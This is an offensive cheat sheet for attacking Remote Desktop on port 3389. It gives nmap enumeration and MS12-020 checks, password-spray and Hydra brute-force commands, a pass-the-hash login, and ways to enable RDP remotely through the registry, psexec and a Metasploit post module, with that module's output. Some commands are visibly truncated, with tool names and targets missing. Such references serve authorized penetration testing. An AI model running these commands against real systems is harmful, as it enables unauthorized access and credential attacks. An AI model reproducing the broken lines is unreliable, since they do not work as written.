3389 - RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection.



Find encryption type:
nmap -p 3389 --script rdp-enum-encryption <target>
Enumerates information from remote RDP services with CredSSP (NLA) authentication enabled:
nmap -p 3389 --script rdp-ntlm-info <target>
Check if vulnerable to MS12-020:
nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>

Brute force access


RDPassSpary is a python tool to perform password spray attack in a Microsoft domain environment.
python3 -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]


./ -b rdp -s 10.xx.xx.xx/32 -u [email protected] -C /root/Desktop/tests/hyda_rdp/rock.txt


hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://

Tools to connect to RDP


Remote Desktop for windows with share and 85% screen:
rdesktop -u username -p password -g 85% -r disk:share=/tmp/share


Login using hash:
Xfreerdp /u:admin /d:win2012 /pth:[hash] /v:
When CredSSP is required:
xfreerdp --plugin rdpdr --data disk:home:/tmp -- -f -u john
To exit press 'ctrl+alt+enter'

Enable RDP

Enable rdp from registry

reg add "\\host\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable from netsh

netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Enable using psexec

psexec \\host reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
/usr/local/bin/ user:[email protected] reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable using metasploit

use post/windows/manage/enable_rdp
msf5 post(windows/manage/enable_rdp) > run
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[+] RDP Service Started
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/
[*] Post module execution completed
msf5 post(windows/manage/enable_rdp) >